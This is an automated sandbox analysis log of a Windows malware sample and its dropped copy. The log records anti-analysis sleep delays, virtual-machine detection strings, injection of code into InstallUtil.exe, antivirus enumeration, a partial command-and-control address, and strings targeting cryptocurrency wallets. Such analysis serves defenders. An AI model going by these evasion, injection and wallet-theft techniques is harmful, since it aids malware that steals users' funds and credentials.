Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -598091s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -597981s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -597854s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -597718s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -597580s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -597362s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3852 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599822
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599691
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599563
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599438
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599313
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599188
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599063
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598953
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598844
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598719
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598609
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598500
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598390
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598281
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598172
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598062
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597932
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597828
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597719
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597594
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597481
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597374
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 37000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36181
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35421
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35093
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34865
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34747
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34638
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34421
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34093
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 33984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 33874
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 33765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 33656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 33546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 33437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 33328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 33218 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 33109 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 32999 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 32890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 32781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 32671 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 32562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 32447 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 32343 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 32186 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31934 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31828 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599339 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599125 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599015 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598906 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598797 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598687 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598578 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598468 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598359 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598156 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597888 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597781 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597655 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597546 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597437 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597319 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597203 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598881 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598750 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598640 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598531 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598421 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598312 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598203 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598091 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597981 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597854 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597718 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597580 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597362 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: msql2.exe, 00000005.00000002.1936667834.0000000003572000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: InstallUtil.exe, 00000001.00000002.4171522011.0000000005EEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: InstallUtil.exe, 00000001.00000002.4171522011.0000000005ED8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
Source: InstallUtil.exe, 00000001.00000002.4168769540.00000000055B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1724334331.0000000001062000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: msql2.exe, 00000005.00000002.1936667834.0000000003572000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: msql2.exe, 00000002.00000002.1866301903.0000000000DB2000.00000004.00000020.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1934161172.00000000016BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 31.41.244.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"Default
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 458000
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 45A000
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 6A2008
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 458000
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 45A000
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C50008
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 458000
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 45A000
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 63A008
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Roaming\msql2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Roaming\msql2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002FE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^qD
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^qd
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q\1
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q$
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002D66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002F21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q<3
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerram Manager
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerram Manager@\^q
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002F75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^qy
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q<
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q\
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002E31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q(5
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002D3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^qL2
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^qT
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002E31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^qt
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q,4
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002F75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^qLV
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^qp
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002D16000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q,
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002D66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002F21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Queries volume information: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe VolumeInformation
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\msql2.exe Queries volume information: C:\Users\user\AppData\Roaming\msql2.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\msql2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\msql2.exe Queries volume information: C:\Users\user\AppData\Roaming\msql2.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\msql2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Electrum
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: tibnejdfjmmkpcnlpebklmnkoeoihofecuTronLinkvnkbihfbeogaeaoehlefnkodbefgpgknnwMetaMaskxfhbohimaelbohpjbbldcngcnapndodjpyBinance Chain Walletzffnbelfdoeiohenkjibnmadjiehjhajb{Yoroi|cjelfplplebdjjenllpjcblmjkfcffne}Jaxx Liberty~fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Exodus Web3
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: InstallUtil.exe, 00000001.00000002.4173707669.0000000006790000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: set_UseMachineKeyStore
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: Yara match File source: 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 3244, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 3384, type: MEMORYSTR